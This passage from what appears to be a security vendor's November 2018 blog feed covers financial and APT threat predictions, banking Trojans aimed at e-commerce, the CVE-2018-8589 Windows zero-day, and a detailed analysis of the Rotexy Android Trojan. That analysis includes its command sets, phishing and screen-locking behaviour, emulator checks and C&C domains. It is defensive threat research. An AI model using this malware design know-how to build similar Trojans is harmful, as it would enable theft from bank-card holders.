The activity of cybercriminals in these regions is constantly growing: the immaturity of protective solutions in the financial sector and the rapid spread of various electronic means of payment among the population and companies in these regions are contributing to this. Now, all the prerequisites exist for the emergence of a new center for financial threats in Asia, in addition to the three already in Latin America, Korean peninsula and the ex-USSR.

  • Continuation of the supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world

This trend will remain with us in 2019. Attacks on software providers have proven effective and allowed attackers to gain access to several major targets. Small companies (that supply specialized financial services for the larger players) will be jeopardized first, such as the suppliers of money transfer systems, banks and exchanges.

  • Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of PoS attacks with attacks on systems accepting online payments

Next year, in terms of threats to ordinary users and stores, those who use cards without chips and do not use two-factor authorization of transactions will be the most at risk. The malicious community has focused on some simple goals that are easy to monetize. However, this does not mean that they do not use any complex techniques. For example, to bypass anti-fraud systems, they copy all computer and browser system settings. On the other hand, this cybercriminal behavior will mean that the number of attacks on PoS terminals will decrease, and they will move towards attacks on online payment platforms instead.

  • The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network

Due to the lack of physical security and the lack of control over connected devices in many networks, cybercriminals will more actively exploit situations where a computer or mini-board can be installed, specifically configured to steal data from the network and transfer the information using 4G/LTE modems.

Attacks like this will provide cybergangs with an opportunity to access various data, including information about the customers of financial institutions, as well as the network infrastructure of financial institutions.

  • Attacks on mobile banking for business users

Mobile applications for business are gaining popularity, which is likely to lead to the first attacks on their users. There are enough tools for this, and the possible losses that businesses incur are much higher than the losses incurred when individuals are attacked. The most likely attack vectors are attacks at the Web API level and through the supply chain.

  • Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wires: result of data leaks

Social engineering is particularly popular in some regions, for example Latin America. Cybercriminals keep targeting specific people in companies and financial institutions to make them wire big sums of money. Due to high amount of data leakages previous years this type of attacks becomes more effective, since criminals are able to use leaked internal information about targeted organization to make their messages look absolutely legit. Main idea remains the same: they make these targets believe that the financial request has come from business partners or directors. These techniques use zero malware, but demonstrate how targeted social engineering gets results and will become more powerful in 2019. This includes attacks like “simswap”.

 “Cyberthreats to financial institutions 2019: overview and predictions” (PDF)

The Rotexy mobile Trojan – banker and ransomware

Thu, 11/22/2018 - 05:00

On the back of a surge in Trojan activity, we decided to carry out an in-depth analysis and track the evolution of some other popular malware families besides Asacub. One of the most interesting and active specimens to date was a mobile Trojan from the Rotexy family. In a three-month period from August to October 2018, it launched over 70,000 attacks against users located primarily in Russia.

An interesting feature of this family of banking Trojans is the simultaneous use of three command sources:

  • Google Cloud Messaging (GCM) service – used to send small messages in JSON format to a mobile device via Google servers;
  • malicious C&C server;
  • incoming SMS messages.

This ‘versatility’ was present in the first version of Rotexy and has been a feature of all the family’s subsequent representatives. During our research we also arrived at the conclusion that this Trojan evolved from an SMS spyware Trojan that was first spotted in October 2014. Back then it was detected as Trojan-Spy.AndroidOS.SmsThief, but later versions were assigned to another family ­– Trojan-Banker.AndroidOS.Rotexy.

The modern version of Rotexy combines the functions of a banking Trojan and ransomware. It spreads under the name AvitoPay.apk (or similar) and downloads from websites with names like youla9d6h.tk, prodam8n9.tk, prodamfkz.ml, avitoe0ys.tk, etc. These website names are generated according to a clear algorithm: the first few letters are suggestive of popular classified ad services, followed by a random string of characters, followed by a two-letter top-level domain. But before we go into the details of what the latest version of Rotexy can do and why it’s distinctive, we would like to give a summary of the path the Trojan has taken since 2014 up to the present day.

Evolution of Rotexy 2014–2015

Since the malicious program was detected in 2014, its main functions and propagation method have not changed: Rotexy spreads via links sent in phishing SMSs that prompt the user to install an app. As it launches, it requests device administrator rights, and then starts communicating with its C&C server.

A typical class list in the Trojan’s DEX file

Until mid-2015, Rotexy used a plain-text JSON format to communicate with its C&C. The C&C address was specified in the code and was also unencrypted:

In some versions, a dynamically generated low-level domain was used as an address:

In its first communication, the Trojan sent the infected device’s IMEI to the C&C, and in return it received a set of rules for processing incoming SMSs (phone numbers, keywords and regular expressions) – these applied mainly to messages from banks, payment systems and mobile network operators. For instance, the Trojan could automatically reply to an SMS and immediately delete it.

Message to C&C requesting an SMS processing template, and the server’s reply

Rotexy then sent information about the smartphone to the C&C, including the phone model, number, name of the mobile network operator, versions of the operating system and IMEI.

With each subsequent request, a new subdomain was generated. The algorithm for generating the lowest-level domain name was hardwired in the Trojan’s code.

The Trojan also registered in Google Cloud Messaging (GCM), meaning it could then receive commands via that service. The Trojan’s list of possible commands has remained practically unchanged throughout its life, and will be described below in detail.

The Trojan’s assets folder contained the file data.db with a list of possible values for the User-Agent field for the PAGE command (which downloads the specified webpage). If the value of this field failed to arrive from the C&C, it was selected from the file data.db using a pseudo-random algorithm.

Contents of data.db

2015–2016

Starting from mid-2015, the Trojan began using the AES algorithm to encrypt data communicated between the infected device and the C&C:

Also starting with the same version, data is sent in a POST request to the relative address with the format “/[number]” (a pseudo-randomly generated number in the range 0–9999).

In some samples, starting from January 2016, an algorithm has been implemented for unpacking the encrypted executable DEX file from the assets folder. In this version of Rotexy, dynamic generation of lowest-level domains was not used.

2016

From mid-2016 on, the cybercriminals returned to dynamic generation of lowest-level domains. No other significant changes were observed in the Trojan’s network behavior.

Query from the Trojan to the C&C

In late 2016, versions of the Trojan emerged that contained the card.html phishing page in the assets/www folder. The page was designed to steal users’ bank card details:

2017–2018

From early 2017, the HTML phishing pages bank.html, update.html and extortionist.html started appearing in the assets folder. Also, in some versions of the Trojan the file names were random strings of characters.

In 2018, versions of Rotexy emerged that contacted the C&C using its IP address. ‘One-time’ domains also appeared with names made up of random strings of characters and numbers, combined with the top-level domains .cf, .ga, .gq, .ml, or .tk.

At this time, the Trojan also began actively using different methods of obfuscation. For example, the DEX file is packed with garbage strings and/or operations, and contains a key to decipher the main executable file from the APK.

Latest version (2018)

Let’s now return to the present day and a detailed description of the functionality of a current representative of the Rotexy family (SHA256: ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84).

Application launch

When launching for the first time, the Trojan checks if it is being launched in an emulation environment, and in which country it is being launched. If the device is located outside Russia or is an emulator, the application displays a stub page:

In this case, the Trojan’s logs contain records in Russian with grammatical errors and spelling mistakes:

If the check is successful, Rotexy registers with GCM and launches SuperService which tracks if the Trojan has device administrator privileges. SuperService also tracks its own status and relaunches if stopped. It performs a privilege check once every second; if unavailable, the Trojan starts requesting them from the user in an infinite loop:

If the user agrees and gives the application the requested privileges, another stub page is displayed, and the app hides its icon:

If the Trojan detects an attempt to revoke its administrator privileges, it starts periodically switching off the phone screen, trying to stop the user actions. If the privileges are revoked successfully, the Trojan relaunches the cycle of requesting administrator privileges.

If, for some reason, SuperService does not switch off the screen when there is an attempt to revoke the device administrator privileges, the Trojan tries to intimidate the user:

While running, Rotexy tracks the following:

  • switching on and rebooting of the phone;
  • termination of its operation – in this case, it relaunches;
  • sending of an SMS by the app – in this case, the phone is switched to silent mode.
C&C communications

The default C&C address is hardwired in the Rotexy code:

The relative address to which the Trojan will send information from the device is generated in a pseudo-random manner. Depending on the Trojan version, dynamically generated subdomains can also be used.

In this sample of the Trojan, the Plugs.DynamicSubDomain value is false, so subdomains are not generated

The Trojan stores information about C&C servers and the data harvested from the infected device in a local SQLite database.

First off, the Trojan registers in the administration panel and receives the information it needs to operate from the C&C (the SMS interception templates and the text that will be displayed on HTML pages):

Rotexy intercepts all incoming SMSs and processes them according to the templates it received from the C&C. Also, when an SMS arrives, the Trojan puts the phone into silent mode and switches off the screen so the user doesn’t notice that a new SMS has arrived. When required, the Trojan sends an SMS to the specified phone number with the information it has received from the intercepted message. (It is specified in the interception template whether a reply must be sent, and which text should be sent to which address.) If the application hasn’t received instructions about the rules for processing incoming SMSs, it simply saves all SMSs to a local database and uploads them to the C&C.

Apart from general information about the device, the Trojan sends a list of all the running processes and installed applications to the C&C. It’s possible the threat actors use this list to find running antivirus or banking applications.

Rotexy will perform further actions after it receives the corresponding commands:

  • START, STOP, RESTART — start, stop, restart SuperService.
  • URL — update C&C address.
  • MESSAGE – send SMS containing specified text to a specified number.
  • UPDATE_PATTERNS – reregister in the administration panel.
  • UNBLOCK – unblock the telephone (revoke device administrator privileges from the app).
  • UPDATE – download APK file from C&C and install it. This command can be used not just to update the app but to install any other software on the infected device.
  • CONTACTS – send text received from C&C to all user contacts. This is most probably how the application spreads.
  • CONTACTS_PRO – request unique message text for contacts from the address book.
  • PAGE – contact URL received from C&C using User-Agent value that was also received from C&C or local database.
  • ALLMSG – send C&C all SMSs received and sent by user, as stored in phone memory.
  • ALLCONTACTS – send all contacts from phone memory to C&C.
  • ONLINE – send information about Trojan’s current status to C&C: whether it has device administrator privileges, which HTML page is currently displayed, whether screen is on or off, etc.
  • NEWMSG – write an SMS to the device memory containing the text and sender number sent from C&C.
  • CHANGE_GCM_ID – change GSM ID.
  • BLOCKER_BANKING_START – display phishing HTML page for entry of bank card details.
  • BLOCKER_EXTORTIONIST_START – display HTML page of the ransomware.
  • BLOCKER_UPDATE_START – display fake HTML page for update.
  • BLOCKER_STOP – block display of all HTML pages.

The C&C role for Rotexy can be filled not only by a web server but also by any device that can send SMSs. The Trojan intercepts incoming SMSs and can receive the following commands from them:

  • “3458” — revoke device administrator privileges from the app;
  • “hi”, “ask” — enable and disable mobile internet;
  • “privet”, “ru” — enable and disable Wi-Fi;
  • “check” — send text “install: [device IMEI]” to phone number from which SMS was sent;
  • “stop_blocker” — stop displaying all blocking HTML pages;
  • “393838” — change C&C address to that specified in the SMS.

Information about all actions performed by Rotexy is logged in the local database and sent to the C&C. The server then sends a reply that contains instructions on further actions to be taken.

Displaying HTML pages

We’ll now look at the HTML pages that Rotexy displays and the actions performed with them.

  • The Trojan displays a fake HTML update page (update.html) that blocks the device’s screen for a long period of time.
  • The Trojan displays the extortion page (extortionist.html) that blocks the device and demands a ransom for unblocking it. The sexually explicit images in this screenshot have been covered with a black box.
  • The Trojan displays a phishing page (bank.html) prompting the user to enter their bank card details. This page mimics a legitimate bank form and blocks the device screen until the user enters all the information. It even has its own virtual keyboard that supposedly protects the victim from keyloggers.

In the areas marked ‘{text}’ Rotexy displays the text it receives from the C&C. Typically, it is a message saying that the user has received a money transfer, and that they must enter their bank card details so the money can be transferred to their account.

The entered data is then checked and the last four digits of the bank card number are also checked against the data sent in the C&C command. The following scenario may play out: according to the templates for processing incoming SMSs, Rotexy intercepts a message from the bank that contains the last four digits of the bank card connected to the phone number. The Trojan sends these digits to the C&C, which in turn sends a command to display a fake data entry window to check the four digits. If the user has provided the details of another card, then the following window is displayed:

Screenshot displaying the message: “You have entered an incorrect card. Enter the card ending in the digits: 1234”

The application leaves the user with almost no option but to enter the correct card number, as it checks the entered number against the bank card details the cybercriminals received earlier.

When all the necessary card details are entered and have been checked, all the information is uploaded to the C&C.

How to unblock the phone

Now for some good news: Rotexy doesn’t have a very well-designed module for processing commands that arrive in SMSs. It means the phone can be unblocked in some cases when it has been blocked by one of the above HTML pages. This is done by sending “3458” in an SMS to the blocked device – this will revoke the administrator privileges from the Trojan. After that it’s necessary to send “stop_blocker” to the same number – this will disable the display of HTML pages that extort money and block the screen. Rotexy may start requesting device administrator privileges again in an infinite loop; in that case, restart the device in safe mode and remove the malicious program.

However, this method may not work if the threat actors react quickly to an attempt to remove the Trojan. In that case, you first need to send the text “393838” in an SMS to the infected device and then repeat all the actions described above; that text message will change the C&C address to “://”, so the phone will no longer receive commands from the real C&C.

Please note that these unblocking instructions are based on an analysis of the current version of Rotexy and have been tested on it. However, it’s possible the set of commands may change in future versions of the Trojan.

Geography of Rotexy attacks

According to our data, 98% of all Rotexy attacks target users in Russia. Indeed, the Trojan explicitly targets Russian-speaking users. There have also been cases of users in Ukraine, Germany, Turkey and several other countries being affected.

Kaspersky Internet Security for Android and the Sberbank Online app securely protect users against attacks by this Trojan.

IOCs

SHA256
0ca09d4fde9e00c0987de44ae2ad51a01b3c4c2c11606fe8308a083805760ee7
4378f3680ff070a1316663880f47eba54510beaeb2d897e7bbb8d6b45de63f96
76c9d8226ce558c87c81236a9b95112b83c7b546863e29b88fec4dba5c720c0b
7cc2d8d43093c3767c7c73dc2b4daeb96f70a7c455299e0c7824b4210edd6386
9b2fd7189395b2f34781b499f5cae10ec86aa7ab373fbdc2a14ec4597d4799ba
ac216d502233ca0fe51ac2bb64cfaf553d906dc19b7da4c023fec39b000bc0d7
b1ccb5618925c8f0dda8d13efe4a1e1a93d1ceed9e26ec4a388229a28d1f8d5b
ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84
ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c
e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec

С&C

2014–2015:

  • secondby.ru
  • darkclub.net
  • holerole.org
  • googleapis.link

2015–2016:

  • test2016.ru
  • blackstar.pro
  • synchronize.pw
  • lineout.pw
  • sync-weather.pw

2016

  • freedns.website
  • streamout.space

2017–2018:

  • streamout.space
  • sky-sync.pw
  • gms-service.info

Kaspersky Security Bulletin: Threat Predictions for 2019

Tue, 11/20/2018 - 05:00

There’s nothing more difficult than predicting. So, instead of gazing into a crystal ball, the idea here is to make educated guesses based on what has happened recently and where we see a trend that might be exploited in the coming months.

Asking the most intelligent people I know, and basing our scenario on APT attacks because they traditionally show the most innovation when it comes to breaking security, here are our main ‘predictions’ of what might happen in the next few months.

No more big APTs

What? How is it possible that in a world where we discover more and more actors every day the first prediction seems to point in the opposite direction?

The reasoning behind this is that the security industry has consistently discovered highly sophisticated government-sponsored operations that took years of preparation. What seems to be a logical reaction to that situation from an attacker’s perspective would be exploring new, even more sophisticated techniques that are much more difficult to discover and to attribute to specific actors.

Indeed, there are many different ways of doing this. The only requirement would be an understanding of the techniques used by the industry for attribution and for identifying similarities between different attacks and the artifacts used in them– something that doesn’t seem to be a big secret. With sufficient resources, a simple solution for an attacker could be having different ongoing sets of activity that are very difficult to relate to the same actor or operation. Well-resourced attackers could start new innovative operations while keeping their old ones alive. Of course, there’s still a good chance of the older operations being discovered, but discovering the new operations would pose a greater challenge.

Instead of creating more sophisticated campaigns, in some cases it appears to be more efficient for some very specific actors who have the capability to do so, to directly target infrastructure and companies where victims can be found, such as ISPs. Sometimes this can be accomplished through regulation, without the need for malware.

Some operations are simply externalized to different groups and companies that use different tools and techniques, making attribution extremely difficult. It’s worth keeping in mind that in the case of government-sponsored operations this ‘centrifugation’ of resources and talent might affect the future of such campaigns. Technical capabilities and tools are owned by the private industry in this scenario, and they are for sale for any customer that, in many cases, doesn’t fully understand the technical details and consequences behind them.

All this suggests that we’re unlikely to discover new highly sophisticated operations – well-resourced attackers are more likely to simply shift to new paradigms.

Networking hardware and IOT

It just seemed logical that at some point every actor would deploy capabilities and tools designed to target networking hardware. Campaigns like VPNFilter were a perfect example of how attackers have already started deploying their malware to create a multipurpose ‘botnet’. In this particular case, even when the malware was extremely widespread, it took some time to detect the attack, which is worrisome considering what might happen in more targeted operations.

Actually, this idea can go even further for well-resourced actors: why not directly target even more elemental infrastructure instead of just focusing on a target organization? We haven’t reached that level of compromise (to our knowledge), but it was clear from past examples (like Regin) how tempting that level of control is for any attacker.

Vulnerabilities in networking hardware allow attackers to follow different directions. They might go for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In this second group we might consider ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker.

All these networking elements might also be part of the mighty IoT, where botnets keep growing at an apparently unstoppable pace. These botnets could be incredibly powerful in the wrong hands when it comes to disrupting critical infrastructure, for instance. This can be abused by well-resourced actors, possibly using a cover group, or in some kind of terror attack.

One example of how these versatile botnets can be used, other than for disruptive attacks, is in short-range frequency hopping for malicious communications, avoiding monitoring tools by bypassing conventional exfiltration channels.

Even though this seems to be a recurrent warning year after year, we should never underestimate IoT botnets – they keep growing stronger.

Public retaliation

One of the biggest questions in terms of diplomacy and geopolitics was how to deal with an active cyberattack. The answer is not simple and depends heavily on how bad and blatant the attack was, among many other considerations. However, it seems that after hacks like that on the Democratic National Committee, things became more serious.

Investigations into recent high-profile attacks, such as the Sony Entertainment Network hacks or the attack on the DNC, culminated in a list of suspects being indicted. That results not only in people facing trial but also a public show of who was behind the attack. This can be used to create a wave of opinion that might be part of an argument for more serious diplomatic consequences.

Actually we have seen Russia suffering such consequences as a result of their alleged interference in democratic processes. This might make others rethink future operations of this kind.

However, the fear of something like that happening, or the thought that it might already have happened, was the attackers’ biggest achievement. They can now exploit such fear, uncertainty and doubt in different, more subtle ways – something we saw in notable operations, including that of the Shadowbrokers. We expect more to come.

What will we see in the future? The propaganda waters were probably just being tested by past operations. We believe this has just started and it will be abused in a variety of ways, for instance, in false flag incidents like we saw with Olympic Destroyer, where it’s still not clear what the final objective was and how it might have played out.

Emergence of newcomers

Simplifying somewhat, the APT world seems to be breaking into two groups: the traditional well-resourced most advanced actors (that we predict will vanish) and a group of energetic newcomers who want to get in on the game.

The thing is that the entry barrier has never been so low, with hundreds of very effective tools, re-engineered leaked exploits and frameworks of all kinds publicly available for anyone to use. As an additional advantage, such tools make attribution nearly impossible and can be easily customized if necessary.

There are two regions in the world where such groups are becoming more prevalent: South East Asia and the Middle East. We have observed the rapid progression of groups suspected of being based in these regions, traditionally abusing social engineering for local targets, taking advantage of poorly protected victims and the lack of a security culture. However, as targets increase their defenses, attackers do the same with their offensive capabilities, allowing them to extend their operations to other regions as they improve the technical level of their tools. In this scenario of scripting-based tools we can also find emerging companies providing regional services who, despite OPSEC failures, keep improving their operations.

One interesting aspect worth considering from a more technical angle is how JavaScript post-exploitation tools might find a new lease of life in the short term, given the difficulty of limiting its functionality by an administrator (as opposed to PowerShell), its lack of system logs and its ability to run on older operating systems.

The negative rings

The year of Meltdown/Specter/AMDFlaws and all the associated vulnerabilities (and those to come) made us rethink where the most dangerous malware actually lives. And even though we have seen almost nothing in the wild abusing vulnerabilities below Ring 0, the mere possibility is truly scary as it would be invisible to almost all the security mechanisms we have.

For instance, in the case of SMM there has at least been a publicly available PoC since 2015. SMM is a CPU feature that would effectively provide remote full access to a computer without even allowing Ring 0 processes to have access to its memory space. That makes us wonder whether the fact that we haven’t found any malware abusing this so far is simply because it is so difficult to detect. Abusing this feature seems to be too good an opportunity to ignore, so we are sure that several groups have been trying to exploit such mechanisms for years, maybe successfully.

We see a similar situation with virtualization/hypervisor malware, or with UEFI malware. We have seen PoCs for both, and HackingTeam even revealed a UEFI persistence module that’s been available since at least 2014, but again no real ITW examples as yet.

Will we ever find these kinds of unicorns? Or haven’t they been exploited yet? The latter possibility seems unlikely.

Your favorite infection vector

In probably the least surprising prediction of this article we would like to say a few words about spear phishing. We believe that the most successful infection vector ever will become even more important in the nearest future. The key to its success remains its ability to spark the curiosity of the victim, and recent massive leaks of data from various social media platforms might help attackers improve this approach.

Data obtained from attacks on social media giants such as Facebook and Instagram, as well as LinkedIn and Twitter, is now available on the market for anyone to buy. In some cases, it is still unclear what kind of data was targeted by the attackers, but it might include private messages or even credentials. This is a treasure trove for social engineers, and could result in, for instance, some attacker using the stolen credentials of some close contact of yours to share something on social media that you already discussed privately, dramatically improving the chances of a successful attack.

This can be combined with traditional scouting techniques where attackers double-check the target to make sure the victim is the right one, minimizing the distribution of malware and its detection. In terms of attachments, it is fairly standard to make sure there is human interaction before firing off any malicious activity, thus avoiding automatic detection systems.

Indeed, there are several initiatives using machine learning to improve phishing’s effectiveness. It’s still unknown what the results would be in a real-life scenario, but what seems clear is that the combination of all these factors will keep spear phishing as a very effective infection vector, especially via social media in the months to come.

Destructive destroyer

Olympic destroyer was one of the most famous cases of potentially destructive malware during the past year, but many attackers are incorporating such capabilities in their campaigns on a regular basis. Destructive attacks have several advantages for attackers, especially in terms of creating a diversion and cleaning up any logs or evidence after the attack. Or simply as a nasty surprise for the victim.

Some of these destructive attacks have geostrategic objectives related to ongoing conflicts as we have seen in Ukraine, or with political interests like the attacks that affected several oil companies in Saudi Arabia. In some other cases they might be the result of hacktivism, or activity by a proxy group that’s used by a more powerful entity that prefers to stay in the shadows.

Anyway, the key to all these attacks is that they are ‘too good’ not to use. In terms of retaliation for instance, governments might use them as a response ranged somewhere between a diplomatic answer and an act of war, and indeed some governments are experimenting with them. Most of these attacks are planned in advance, which involves an initial stage of reconnaissance and intrusion. We don’t know how many potential victims are already in this situation where everything is ready, just waiting for the trigger to be pulled, or what else the attackers have in their arsenal waiting for the order to attack.

ICS environments and critical infrastructure are especially vulnerable to such attacks, and even though industry and governments have put a lot of effort in over the last few years to improve the situation, things are far from ideal. That’s why we believe that even though such attacks will never be widespread, in the next year we expect to see some occurring, especially in retaliation to political decisions.

Advanced supply chain

This is one of the most worrisome vectors of attack, which has been successfully exploited over the last two years, and it has made everyone think about how many providers they have and how secure they are. Well, there is no easy answer to this kind of attack.

Even though this is a fantastic vector for targeting a whole industry (similar to watering hole attacks) or even a whole country (as seen with NotPetya), it’s not that good when it comes to more targeted attacks as the risk of detection is higher. We have also seen more indiscriminate attempts like injecting malicious code in public repositories for common libraries. The latter technique might be useful in very carefully timed attacks when these libraries are used in a very particular project, with the subsequent removal of the malicious code from the repository.

Now, can this kind of attack be used in a more targeted way? It appears to be difficult in the case of software because it will leave traces everywhere and the malware is likely to be distributed to several customers. It is more realistic in cases when the provider works exclusively for a specific customer.

What about hardware implants? Are they a real possibility? There has been some recent controversy about that. Even though we saw from Snowden’s leaks how hardware can be manipulated on its way to the customer, this does not appear to be something that most actors can do other than the very powerful ones. And even they will be limited by several factors.

However, in cases where the buyer of a particular order is known, it might be more feasible for an actor to try and manipulate hardware at its origin rather than on its way to the customer.

It’s difficult to imagine how all the technical controls in an industrial assembly line could be circumvented and how such manipulation could be carried out. We don’t want to discard this possibility, but it would probably entail the collaboration of the manufacturer.

All in all, supply chain attacks are an effective infection vector that we will continue to see. In terms of hardware implants we believe it is extremely unlikely to happen and if it does, we will probably never know….

And mobile

This is in every year’s predictions. Nothing groundbreaking is expected, but it’s always interesting to think about the two speeds for this slow wave of infections. It goes without saying that all actors have mobile components in their campaigns; it makes no sense only going for PCs. The reality is that we can find many examples of artifacts for Android, but also a few improvements in terms of attacking iOS.

Even though successful infections for iPhone requires concatenating several 0-days, it’s always worth remembering that incredibly well-resourced actors can pay for such technology and use it in critical attacks. Some private companies claim they can access any iPhone that they physically possess. Other less affluent groups can find some creative ways to circumvent security on such devices using, for instance, rogue MDM servers and asking targets through social engineering to use them in their devices, providing the attackers with the ability to install malicious applications.

It will be interesting to see if the boot code for iOS leaked at the beginning of the year will provide any advantage to the attackers, or if they’ll find new ways of exploiting it.

In any case, we don’t expect any big outbreak when it comes to mobile targeted malware, but we expect to see continuous activity by advanced attackers aimed at finding ways to access their targets’ devices.

The other things

What might attackers be thinking about in more futuristic terms? One of the ideas, especially in the military field, might be to stop using weak error-prone humans and replacing them with something more mechanical. With that in mind, and also thinking of the alleged GRU agents expelled from the Netherlands last April after trying to hack into the OPCW’s Wi-Fi network as an example, what about using drones instead of human agents for short-range hacking?

Or what about backdooring some of the hundreds of cryptocurrency projects for data gathering, or even financial gain?

Use of any digital good for money laundering? What about using in-game purchases and then selling such accounts later in the marketplace?

There are so many possibilities that predictions always fall short of reality. The complexity of the environment cannot be fully understood anymore, raising possibilities for specialist attacks in different areas. How can a stock exchange’s internal inter-banking system be abused for fraud? I have no idea, I don’t even know if such a system exists. This is just one example of how open to the imagination the attackers behind these campaigns are.

We are here to try and anticipate, to understand the attacks we don’t, and to prevent them from occurring in the future.

Full report “Kaspersky Security Bulletin: Threat Predictions for 2019” (English, PDF)

Black Friday alert

Thu, 11/15/2018 - 05:00

Banking Trojans traditionally target users of online financial services; looking for financial data to steal or building botnets out of hacked devices for future attacks. However, over time, several of these banking Trojans have enhanced their functionality, launching new variants and extending their range. Some are now able to obtain root access to infected devices, perform transactions, inject other malicious code, record video, and more. And the victims of such malware are not just people who bank online but online shoppers in general.
According to Kaspersky Lab data, 14 malware families are targeting e-commerce brands to steal from victims. The main ones are Betabot, Panda, Gozi, Zeus, Chthonic, TinyNuke, Gootkit2, IcedID and SpyEye. They are all banking Trojans. Detections of their e-commerce-related activity has increased steadily over the last few years, from 6.6 million in 2015 to an estimated 12.3 million by the end of 2018 (based on the extrapolation of a detection number of 9.2 million at the end of Q3, 2018), with a 12% increase between 2016 and 2017, and a 10% expected rise between 2017 and 2018.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Overall detection data for main malware Trojans targeting users of e-commerce brands, 2015 – 2018. Source: KSN (download)

Attack method

The Trojans are using the e-commerce brands to hunt user credentials like login, password, card number, phone number, and more. In order to do so, the malware can intercept input data on target sites, modify online page content, and/or redirect visitors to phishing pages.
For example, the Trojans enable the cybercriminals behind them to monitor users’ online behavior: tracking which sites are visited on the infected device. If the Trojan spots the user browsing to a target e-commerce website, it activates its form-grabbing functionality. ‘Form grabbing’ is a technique used by criminals to save all the information that a user enters into forms on a website. And on an e-commerce website, such forms are almost certain to contain: login and password combination as well as payment data such as credit card number, expiration date and CVV. If there is no two-factor transaction confirmation in place, then the criminals who obtained this data can use it to steal money.

Target brands

The 14 malware families were found to be targeting a total of 67 consumer e-commerce sites between them. This includes 33 ‘consumer apparel’ sites (clothing, footwear, gifts, toys, jewelry and department stores), eight consumer electronics sites, eight entertainment and gaming sites, three popular telecoms sites, two online payment sites, and three online retail platforms, among others.
Betabot targets as many as 46 different brands, and was the only Trojan to target entertainment and gaming sites, while Gozi targets 36 brands overall, and Panda 35.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Proportion of e-commerce categories targeted by malware, 2018 (download)

Why would banking Trojans target e-commerce sites?

One possibility is financial gain by selling the credentials: our research uncovered over three million sets of e-commerce credentials up for sale on a marketplace easily accessible through the Google search engine. The highest prices are charged for what appear to be hacked merchant accounts.
Another way of making money could be to use rather than sell the compromised credentials. Cybercriminals could, for example, use the stolen accounts in money-laundering schemes: buying things from a website using victims’ credentials so they look like known customers and don’t trigger any anti-fraud measures, and then selling those items on again.

Target geography

In 2018, malware attacks to steal data through e-commerce brands were particularly active in European countries, including Italy, Germany and France, as well as in North America, Russia and emerging markets.
For example, most of those affected by Betabot attacks through e-commerce sites were located in Italy (where 14.13% of users affected by any malware in the first eight months of 2018 were targeted by this threat), Germany (6.04%), Russia (5.5%) and India (4.87%). For Gozi the pattern was similar: 19.57% of users affected by any malware in Italy were targeted by this threat, with Russia second (13.89%), followed by Brazil (11.96%) and France (5.91%).

Advice and recommendations

To stay safe from such threats during the busy festive shopping season, Kaspersky Lab recommends taking the following security measures:

If you are a consumer

  • A powerful, updated security solution is a must for all devices you use to shop online. Avoid buying anything online from websites that look potentially dangerous or resemble an incomplete version of a trusted brand’s website.
  • Don’t click on unknown links in email or social media messages, even from people you know, unless you were expecting the message.

If you are an online brand or trader

  • Use a reputable payment service and keep your online trading and payment platform software up to date. Every new update may contain critical patches to make the system less vulnerable to cybercriminals.
  • Use a tailored security solution to protect your business and customers.
  • Pay attention to the personal information used by customers to buy from you. Use a fraud prevention solution that you can adjust to your company profile and the profile of your customers.
  • Think about how much money you wish to keep in an online payment transaction account at any one time. The greater the balance, the higher the value of that account to hackers.
  • Restrict the number of attempted transactions and always use two-factor authentication (Verified by Visa, MasterCard Secure Code, etc.).

The research is based on data obtained with user consent and processed using Kaspersky Security Network (KSN). All malware belonging to the banking Trojans covered in the report are detected and blocked by Kaspersky Lab security solutions.

Full report “Buyer beware: cyberthreats targeting e-commerce, 2018” (English, PDF)

A new exploit for zero-day vulnerability CVE-2018-8589

Wed, 11/14/2018 - 02:00

Yesterday, Microsoft published its security bulletin, which patches a vulnerability discovered by our technologies. We reported it to Microsoft on October 17, 2018. The company confirmed the vulnerability and assigned it CVE-2018-8589.

In October 2018, our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft’s Windows operating system. Further analysis revealed a zero-day vulnerability in win32k.sys. The exploit was executed by the first stage of a malware installer in order to gain the necessary privileges for persistence on the victim’s system. So far, we have detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.

Kaspersky Lab products detected this exploit proactively using the following technologies:

  • Behavioral Detection Engine and Automatic Exploit Prevention for endpoints
  • Advanced Sandboxing and Anti-Malware Engine for Kaspersky Anti Targeted Attack Platform (KATA)

Kaspersky Lab verdicts for the artifacts in this campaign are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

More information about the attack is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Technical details

CVE-2018-8589 is a race condition present in win32k!xxxMoveWindow due to improper locking of messages sent synchronously between threads.

The exploit uses the vulnerability by creating two threads with a class and associated window and moves the window of the opposite thread inside the callback of a WM_NCCALCSIZE message in a window procedure that is common to both threads.

WM_NCCALCSIZE message in win32k!xxxCalcValidRects

Termination of the opposite thread on the maximum level of recursion inside the WM_NCCALCSIZE callback will cause asynchronous copyin of the lParam structure controlled by the attacker.

